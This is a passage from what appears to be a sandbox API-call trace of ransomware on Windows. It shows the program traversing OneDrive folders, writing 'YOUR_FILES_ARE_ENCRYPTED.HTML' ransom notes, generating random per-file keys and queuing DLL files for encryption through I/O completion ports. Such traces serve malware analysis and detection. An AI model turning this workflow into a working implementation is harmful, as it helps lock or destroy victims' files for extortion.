Size=0x10000) returned 0x30c81a0 [0112.774] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab-pk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab-pk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab-pk" [0112.774] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab-pk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab-pk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab-pk\\*" [0112.774] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab-pk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1bc7bb71, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1bc7bb71, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1bc7bb71, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1a27ec3, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0112.776] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1bc7bb71, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1bc7bb71, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1bc7bb71, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1a27ec3, cFileName="..", cAlternateFileName="")) returned 1 [0112.776] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1bc7bb71, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1bc7bb71, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1bc7bb71, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1a27ec3, cFileName="..", cAlternateFileName="")) returned 0 [0112.777] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0112.777] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0112.777] GetProcessHeap () returned 0x600000 [0112.777] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sd-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\sd-arab-pk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0112.777] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.778] CloseHandle (hObject=0x334) returned 1 [0112.778] GetProcessHeap () returned 0x600000 [0112.778] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.778] GetProcessHeap () returned 0x600000 [0112.779] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0112.779] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1478f592, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1478f592, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x149cb731, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x2ff40, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0112.779] StrStrIW (lpFirst="sqmapi.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.779] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sqmapi.dll") returned 86 [0112.779] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0112.779] lstrlenW (lpString=".dll") returned 4 [0112.779] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0112.779] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sqmapi.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\sqmapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0112.779] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=196416) returned 1 [0112.779] GetProcessHeap () returned 0x600000 [0112.779] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0112.780] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="27") returned 2 [0112.780] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="CD") returned 2 [0112.780] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="46") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="92") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="32") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="04") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="8A") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="3E") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="DE") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="9D") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="CD") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="09") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="FB") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="A8") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="47") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="0B") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="F0") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="1B") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="0E") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="C2") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="AA") returned 2 [0112.781] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="3E") returned 2 [0112.781] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="95") returned 2 [0112.781] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="4C") returned 2 [0112.781] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="F0") returned 2 [0112.781] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="49") returned 2 [0112.781] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="C9") returned 2 [0112.781] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="A8") returned 2 [0112.781] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="DB") returned 2 [0112.781] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="77") returned 2 [0112.781] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="3E") returned 2 [0112.781] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="2B") returned 2 [0112.782] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sqmapi.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sqmapi.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sqmapi.dll" [0112.782] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.782] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0112.782] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16909517, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x16909517, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16c7693c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x9ac0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="SqmWrapper.dll", cAlternateFileName="SQMWRA~1.DLL")) returned 1 [0112.782] StrStrIW (lpFirst="SqmWrapper.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.782] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SqmWrapper.dll") returned 90 [0112.782] PathFindExtensionW (pszPath="SqmWrapper.dll") returned=".dll" [0112.782] lstrlenW (lpString=".dll") returned 4 [0112.782] PathFindExtensionW (pszPath="SqmWrapper.dll") returned=".dll" [0112.782] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SqmWrapper.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\sqmwrapper.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0112.785] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=39616) returned 1 [0112.785] GetProcessHeap () returned 0x600000 [0112.785] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0112.788] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="CF") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="63") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="DE") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="E0") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="60") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="28") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="02") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="B6") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="CF") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="E2") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="68") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="40") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="CF") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="9E") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="15") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="40") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="22") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="78") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="FC") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="7E") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="73") returned 2 [0112.788] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="21") returned 2 [0112.788] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="7E") returned 2 [0112.788] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="FB") returned 2 [0112.788] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="9D") returned 2 [0112.788] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="AC") returned 2 [0112.788] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="1C") returned 2 [0112.789] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="5C") returned 2 [0112.789] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="87") returned 2 [0112.789] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="0F") returned 2 [0112.789] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="7A") returned 2 [0112.789] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="4A") returned 2 [0112.789] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SqmWrapper.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SqmWrapper.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SqmWrapper.dll" [0112.789] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.789] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0112.789] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17410332, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x17410332, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1c297983, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x130000, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="SyncEngine.dll", cAlternateFileName="SYNCEN~1.DLL")) returned 1 [0112.789] StrStrIW (lpFirst="SyncEngine.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.789] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SyncEngine.dll") returned 90 [0112.789] PathFindExtensionW (pszPath="SyncEngine.dll") returned=".dll" [0112.789] lstrlenW (lpString=".dll") returned 4 [0112.789] PathFindExtensionW (pszPath="SyncEngine.dll") returned=".dll" [0112.789] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SyncEngine.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\syncengine.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0112.793] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1245184) returned 1 [0112.793] GetProcessHeap () returned 0x600000 [0112.793] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x688490 [0112.795] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="10") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="F6") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="2F") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="25") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="19") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="28") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="B4") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="27") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="0F") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="C9") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="D2") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="6C") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="05") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="EC") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="3A") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="3B") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="32") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="4F") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="7F") returned 2 [0112.795] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="A2") returned 2 [0112.796] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="BE") returned 2 [0112.796] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="42") returned 2 [0112.796] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="E1") returned 2 [0112.796] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="7C") returned 2 [0112.796] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="48") returned 2 [0112.796] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="EC") returned 2 [0112.796] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="8D") returned 2 [0112.796] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="B4") returned 2 [0112.796] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="22") returned 2 [0112.796] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="53") returned 2 [0112.796] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="69") returned 2 [0112.796] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="00") returned 2 [0112.796] lstrcpyW (in: lpString1=0x698544, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SyncEngine.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SyncEngine.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SyncEngine.dll" [0112.796] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x688490, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.796] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x688490, lpOverlapped=0x688490) returned 1 [0112.796] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17410332, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x17410332, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1c297983, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x130000, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="SyncEngine.dll", cAlternateFileName="SYNCEN~1.DLL")) returned 0 [0112.797] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0112.798] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0112.798] GetProcessHeap () returned 0x600000 [0112.798] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0112.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0112.799] WriteFile (in: hFile=0x31c, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0112.800] CloseHandle (hObject=0x31c) returned 1 [0112.800] GetProcessHeap () returned 0x600000 [0112.800] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0112.800] GetProcessHeap () returned 0x600000 [0112.800] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0112.800] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4be92b64, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6abcad0b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6aeebefe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="17.3.5892.0626_3", cAlternateFileName="173589~4.062")) returned 1 [0112.800] StrStrIW (lpFirst="17.3.5892.0626_3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.800] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3") returned 75 [0112.800] GetProcessHeap () returned 0x600000 [0112.801] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0112.801] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3" [0112.801] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\*" [0112.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4be92b64, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6abcad0b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6aeebefe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.805] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4be92b64, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6abcad0b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6aeebefe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="..", cAlternateFileName="")) returned 1 [0112.807] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6915b22f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6915b22f, 